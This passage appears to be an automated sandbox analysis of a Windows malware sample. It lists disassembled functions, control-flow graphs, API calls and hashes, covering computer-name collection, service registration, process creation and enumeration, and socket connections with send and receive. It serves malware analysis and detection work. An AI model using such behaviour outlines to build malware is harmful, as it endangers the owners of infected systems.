                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: SleepTime$FileSystem__aulldiv
                                                                                                                                                                                                            • String ID: C:\whfkpbh\amdrhfskpcu.exe$wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
                                                                                                                                                                                                            • API String ID: 3227937447-2559296042
                                                                                                                                                                                                            • Opcode ID: 39dec3fa197a23e8428c1119ec35419c93c428d93996f14d5e9a5bac583e8f47
                                                                                                                                                                                                            • Instruction ID: 859dc9bc5602d084fa999fe1f82ab3b24767d83da741eb5aafe56970c0b74639
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39dec3fa197a23e8428c1119ec35419c93c428d93996f14d5e9a5bac583e8f47
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED422371A01204DFD708DF64FD96AAA3BB1FB58300F11825AE44697EB4EB309AE5CF51
                                                                                                                                                                                                            Function 00150920 Relevance: 4.8, APIs: 3, Instructions: 254libraryloaderencryptionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1615 150920-150943 1616 150945-150958 1615->1616 1617 15095e-15099c 1615->1617 1616->1617 1618 15099e-1509a8 1617->1618 1619 1509aa-1509b7 1617->1619 1620 1509be-150a34 call 163110 1618->1620 1619->1620 1623 150bd4-150bea 1620->1623 1624 150a3a-150aa5 call 142f90 GetProcAddress 1620->1624 1626 150bec-150bf4 1623->1626 1627 150bfa-150c01 1623->1627 1631 150aa7-150ab1 1624->1631 1632 150ab3-150ac0 1624->1632 1626->1627 1629 150c03-150c18 CryptGenRandom 1627->1629 1630 150c58-150c7c 1627->1630 1629->1630 1633 150c1a-150c52 1629->1633 1634 150c94 1630->1634 1635 150c7e-150c92 1630->1635 1636 150ac7-150b44 call 142f90 call 151bb0 GetProcAddress call 151bb0 1631->1636 1632->1636 1633->1630 1637 150c9e-150ca6 1634->1637 1635->1637 1655 150b46-150b4d 1636->1655 1656 150b9d-150bb7 1636->1656 1639 150d64-150da2 call 16fcc0 1637->1639 1640 150cac-150cda call 142860 * 2 1637->1640 1651 150cdc-150d02 1640->1651 1652 150d08-150d58 call 142860 * 2 1640->1652 1651->1652 1652->1639 1663 150d5a 1652->1663 1655->1656 1659 150b4f-150b5b 1655->1659 1657 150bbd-150bd1 1656->1657 1657->1623 1662 150b62-150b64 1659->1662 1662->1656 1664 150b66-150b9b 1662->1664 1663->1639 1664->1657
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
                                                                                                                                                                                                            • CryptGenRandom.ADVAPI32(00000000,00000004,00000000,00000000), ref: 00150C10
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$CryptRandom
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 646182245-0
                                                                                                                                                                                                            • Opcode ID: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
                                                                                                                                                                                                            • Instruction ID: 9a44081cad21fa68937cdfac915acb2760fe07f4e57f5f8e993902d14031d0fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB176B2A00315DBC315DFA9FC85A253BB4FB58715B01422EE8569BEB8E33089D5CF85
                                                                                                                                                                                                            Function 00169B00 Relevance: 2.2, APIs: 1, Instructions: 701COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1713 169b00-169ba3 call 14f230 1716 169ba5 1713->1716 1717 169baf-169bdb call 170a20 call 15f150 1713->1717 1716->1717 1722 169bdd-169be9 call 152970 1717->1722 1723 169beb 1717->1723 1725 169bf5-169c2b 1722->1725 1723->1725 1727 169c40-169c51 GetComputerNameA 1725->1727 1728 169c2d-169c3a 1725->1728 1729 169c53-169cca call 142f90 call 1413e0 call 151bb0 1727->1729 1730 169cd0-169ce6 1727->1730 1728->1727 1729->1730 1731 169d1c-169dea call 142f90 call 1413e0 call 151bb0 call 14d530 1730->1731 1732 169ce8-169d0a 1730->1732 1748 169dfe-169e3c call 152c30 1731->1748 1749 169dec-169df8 1731->1749 1732->1731 1734 169d0c-169d17 1732->1734 1734->1731 1752 169e3e-169e53 1748->1752 1753 169e5a-169ed6 call 1413e0 call 14c580 call 16a7e0 1748->1753 1749->1748 1752->1753 1760 169f02-169f4e call 15a930 1753->1760 1761 169ed8-169efb 1753->1761 1764 169f50 1760->1764 1765 169f5a-16a033 call 14d500 call 1701a0 call 171050 call 14e310 call 152c30 1760->1765 1761->1760 1764->1765 1776 16a035-16a063 1765->1776 1777 16a092-16a1b5 call 1701a0 call 171050 call 14e310 call 152c30 call 1701a0 call 171050 call 14e310 call 152c30 call 1701a0 call 171050 call 14e310 1765->1777 1778 16a065-16a07c 1776->1778 1779 16a07e-16a08b 1776->1779 1802 16a1b7-16a1c1 1777->1802 1803 16a1c3-16a1d0 1777->1803 1778->1777 1779->1777 1804 16a1d7-16a254 call 152c30 call 1701a0 call 171050 call 14e310 call 152c30 1802->1804 1803->1804 1815 16a256-16a26e 1804->1815 1816 16a274-16a37b call 142f90 call 1701a0 call 171050 call 14e310 call 151bb0 call 152c30 call 1701a0 call 171050 call 14e310 1804->1816 1815->1816 1835 16a387-16a3d4 call 152c30 call 1701a0 call 171050 call 14e310 1816->1835 1836 16a37d 1816->1836 1845 16a3d6-16a3f2 1835->1845 1846 16a3f8-16a581 call 152c30 call 152f60 call 156600 call 1701a0 call 171050 call 14e310 call 152c30 call 1699f0 call 1701a0 call 171050 call 14e310 call 14d670 call 14def0 call 1597b0 call 15d990 1835->1846 1836->1835 1845->1846 1877 16a583-16a58d 1846->1877 1878 16a59c-16a5c4 call 14d670 call 14def0 call 154290 1846->1878 1877->1878 1879 16a58f-16a595 1877->1879 1886 16a5c6-16a5de 1878->1886 1887 16a5e5-16a607 call 14ae40 1878->1887 1879->1878 1886->1887 1890 16a62c-16a636 call 160480 1887->1890 1891 16a609-16a620 1887->1891 1894 16a63b-16a679 call 16a7e0 1890->1894 1891->1890 1892 16a622 1891->1892 1892->1890 1897 16a696-16a6ec call 16a7e0 * 2 1894->1897 1898 16a67b-16a690 1894->1898 1903 16a6ee-16a708 1897->1903 1904 16a738-16a74b call 14e310 call 16b940 1897->1904 1898->1897 1906 16a70a-16a727 call 14e310 call 16b940 1903->1906 1907 16a728-16a733 1903->1907 1907->1904
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000010), ref: 00169C49
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3545744682-0
                                                                                                                                                                                                            • Opcode ID: 9220cc9c9a1f5675a9203f292a9059f11226fd8a05d40183f4828c667a17de15
                                                                                                                                                                                                            • Instruction ID: 34e6f4f578bdec1e6be86874b55dc7acfcab8c70e72e6e697f1b4be8d9521ef9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9220cc9c9a1f5675a9203f292a9059f11226fd8a05d40183f4828c667a17de15
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72621371900205DFD709EF60FC86AA97BB8FBA4300F90815AE446A7DB5EB309AD5CF51
                                                                                                                                                                                                            Function 0014C660 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0014C692
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3789849863-0
                                                                                                                                                                                                            • Opcode ID: 3c536f3847f32ef5e49169e1599c94027631dae4c457486be30412fe90921ee2
                                                                                                                                                                                                            • Instruction ID: a58d952cd8e76c61e1fe2f3448b1df420af2cf5de54f1e50ec7d677e88862a53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c536f3847f32ef5e49169e1599c94027631dae4c457486be30412fe90921ee2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06E01271D01209DBC744DFB4ED4546EBBF4FB88304B814959E414EB650EB705640CFC5
                                                                                                                                                                                                            Function 00156C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 187registrysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1123 156c10-156c1f 1124 156c21-156c49 1123->1124 1125 156c63-156c8f 1123->1125 1124->1125 1126 156c4b-156c5d 1124->1126 1127 156c91 1125->1127 1128 156c9b-156d1b 1125->1128 1126->1125 1127->1128 1129 156d27-156d9c RegisterServiceCtrlHandlerA 1128->1129 1130 156d1d 1128->1130 1131 156da2-156e39 SetServiceStatus CreateEventA 1129->1131 1132 156fc8-156fd4 1129->1132 1130->1129 1133 156e58-156e9a SetServiceStatus 1131->1133 1134 156e3b-156e4a 1131->1134 1136 156ea0-156ec9 WaitForSingleObject 1133->1136 1134->1133 1135 156e4c-156e52 1134->1135 1135->1133 1136->1136 1137 156ecb-156ee7 1136->1137 1138 156ef3-156fc2 call 163110 SetServiceStatus CloseHandle SetServiceStatus 1137->1138 1139 156ee9 1137->1139 1138->1132 1139->1138
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(0113E608,Function_00011860), ref: 00156D72
                                                                                                                                                                                                            • SetServiceStatus.SECHOST(0114A1C8,001B05F8), ref: 00156DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000230,00001388), ref: 00156EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000230), ref: 00156F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(0114A1C8,001B05F8), ref: 00156FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: 40ec19d656a58706c57997c51155d74a87f515a578a80e6159e34f145aafe141
                                                                                                                                                                                                            • Instruction ID: 5a1c3a6e04a96dff3e1d90b3f17175ac5cad2d66a39274963f12cd4536c4cc8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40ec19d656a58706c57997c51155d74a87f515a578a80e6159e34f145aafe141
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E91DBB1901301CFC306DF28FD8A9663FB4FB88715781821AE49586EB4E73885E5CF85
                                                                                                                                                                                                            Function 0016FA80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1179 16fa80-16faa8 1180 16fabe-16fadf 1179->1180 1181 16faaa-16fab7 1179->1181 1182 16fb00-16fb19 1180->1182 1183 16fae1-16fafe 1180->1183 1181->1180 1184 16fb20-16fbf9 call 16a7e0 * 2 CreateProcessA 1182->1184 1183->1184 1189 16fc8f-16fcb3 1184->1189 1190 16fbff-16fc8e CloseHandle * 2 1184->1190
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00162CD6,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000001), ref: 0016FBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00162CD6,?,?,?,?,?,00000001), ref: 0016FC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000001), ref: 0016FC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                                                                                                                            • Opcode ID: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
                                                                                                                                                                                                            • Instruction ID: b5e36886409db179b7c7625acc9b4959b6bec182829420ef1e314270b64b7669
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9542ac12595cab16621c469d33f1d8401552a73f37da0d947711aa3d00ecbda6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA51EA31950218DBD704DF64FC86BB63BF8FB48B11F40021AE04696EB4EBB496E4CB95
                                                                                                                                                                                                            Function 00152120 Relevance: 6.2, APIs: 4, Instructions: 207processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1191 152120-15218a 1192 152196-1521f8 CreateToolhelp32Snapshot 1191->1192 1193 15218c 1191->1193 1194 1521fe-152239 1192->1194 1195 1524b9-1524fd call 16a7e0 1192->1195 1193->1192 1197 15224f-152274 Process32First 1194->1197 1198 15223b-152248 1194->1198 1200 15240d-15244e FindCloseChangeNotification 1197->1200 1201 15227a 1197->1201 1198->1197 1202 152450-152469 1200->1202 1203 15246b-152497 1200->1203 1204 152280-152292 1201->1204 1202->1195 1203->1195 1205 152499-1524b2 1203->1205 1206 152294-1522a0 1204->1206 1207 1522a6-1522ce call 1413e0 1204->1207 1205->1195 1206->1207 1210 1522d0-1522e6 1207->1210 1211 15230f 1207->1211 1212 152319-152344 call 14a4e0 call 16b260 1210->1212 1213 1522e8-15230d 1210->1213 1211->1212 1218 152346-152396 Process32Next 1212->1218 1219 15239e-1523ac 1212->1219 1213->1212 1218->1204 1220 15239c 1218->1220 1221 1523d2-152401 1219->1221 1222 1523ae-1523cc 1219->1222 1220->1200 1221->1200 1223 152403 1221->1223 1222->1221 1223->1200
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00152257
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00152384
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152426
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3243318325-0
                                                                                                                                                                                                            • Opcode ID: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
                                                                                                                                                                                                            • Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51
                                                                                                                                                                                                            Function 00160FD8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1224 160fd8-160fdf 1225 160fe0-161017 1224->1225 1226 161029-16103e 1225->1226 1227 161019-161022 1225->1227 1228 161040 1226->1228 1229 16104a-16106c 1226->1229 1227->1225 1230 161024 1227->1230 1228->1229 1232 1610d3-1610ea 1229->1232 1233 16106e-161079 1229->1233 1231 1610f1-161125 call 14d500 * 2 1230->1231 1241 16228c-16229a call 14e310 1231->1241 1242 16112b-161138 1231->1242 1232->1231 1234 161080-1610a8 1233->1234 1236 1610bc-1610d1 1234->1236 1237 1610aa-1610b6 1234->1237 1236->1232 1236->1234 1237->1236 1244 161144-1611ea call 14c580 call 142f90 call 14d530 call 151bb0 1242->1244 1245 16113a 1242->1245 1255 1611fe-16120a call 14d670 1244->1255 1256 1611ec-1611f8 1244->1256 1245->1244 1259 161210-16123a call 142f90 1255->1259 1260 1613bf-1614a0 call 1701a0 call 171050 call 14e310 call 142f90 call 1701a0 call 171050 call 14e310 call 151bb0 1255->1260 1256->1255 1266 16124c-1612a3 call 15a810 call 143410 call 16b940 call 151bb0 1259->1266 1267 16123c-161246 1259->1267 1297 1614b6-1614ca 1260->1297 1298 1614a2-1614b4 1260->1298 1285 16136c-161393 1266->1285 1286 1612a9-161366 call 157fa0 call 16b500 call 142f90 call 14d530 call 151bb0 1266->1286 1267->1266 1288 1613b5 1285->1288 1289 161395-1613b3 1285->1289 1286->1285 1288->1260 1289->1260 1300 1614d0-16151e call 1701a0 call 171050 call 14e310 1297->1300 1298->1300 1312 161524-161542 1300->1312 1313 1616ec-16177b call 142f90 call 1701a0 call 171050 call 14e310 call 151bb0 1300->1313 1314 161544-161559 1312->1314 1315 16156f-161582 1312->1315 1336 161786-1617b0 socket 1313->1336 1337 16177d-161781 call 171050 1313->1337 1318 16155b-16156d 1314->1318 1319 161589-1616e6 call 142f90 call 1701a0 call 171050 call 14e310 call 142f90 call 151bb0 call 14d670 call 175820 call 151bb0 call 1701a0 call 171050 call 14e310 1314->1319 1315->1319 1318->1319 1319->1313 1340 1617b2-1617dd call 14e310 1336->1340 1341 1617de-1617f5 1336->1341 1337->1336 1343 1618c4-1618e7 gethostbyname 1341->1343 1344 1617fb-161864 setsockopt 1341->1344 1343->1241 1350 1618ed-16191a 1343->1350 1347 161866-161872 1344->1347 1348 1618b8-1618c2 1344->1348 1352 161874-16188e 1347->1352 1353 161890-1618b6 1347->1353 1348->1343 1355 161976-1619c8 inet_ntoa inet_addr htons connect 1350->1355 1356 16191c-16193f 1350->1356 1352->1343 1353->1343 1360 1619e0-161a1c call 14d670 call 14def0 send 1355->1360 1361 1619ca-1619df call 14e310 1355->1361 1358 161955-16196f 1356->1358 1359 161941-161953 1356->1359 1358->1355 1359->1355 1372 161a2e-161a38 call 14d670 1360->1372 1373 161a1e-161a29 1360->1373 1379 161a3e-161a54 1372->1379 1380 161acc-161b51 call 15d990 recv 1372->1380 1373->1372 1382 161a56-161a91 call 14e310 1379->1382 1383 161a92-161acb call 14e310 1379->1383 1390 161b57-161b69 call 141df0 1380->1390 1391 1621ad-16220e closesocket 1380->1391 1390->1391 1401 161b6f-161b7d 1390->1401 1395 162210-162222 1391->1395 1396 16222e-162230 1391->1396 1395->1396 1398 162224 1395->1398 1399 162232-162268 call 157fa0 call 16b500 1396->1399 1400 16226e-162286 1396->1400 1398->1396 1399->1400 1400->1241 1403 161bc6-161be0 1401->1403 1404 161b7f-161ba6 1401->1404 1406 161be6-161c09 call 14d670 call 150110 1403->1406 1404->1406 1407 161ba8-161bc4 1404->1407 1414 161c0b-161c32 1406->1414 1415 161c39-161c42 call 14c530 1406->1415 1407->1406 1414->1415 1415->1391 1418 161c48-161c75 call 154290 1415->1418 1421 161c7b-161d23 call 142f90 call 15a810 call 143410 call 16b940 call 151bb0 1418->1421 1422 161fd9-161ffd 1418->1422 1452 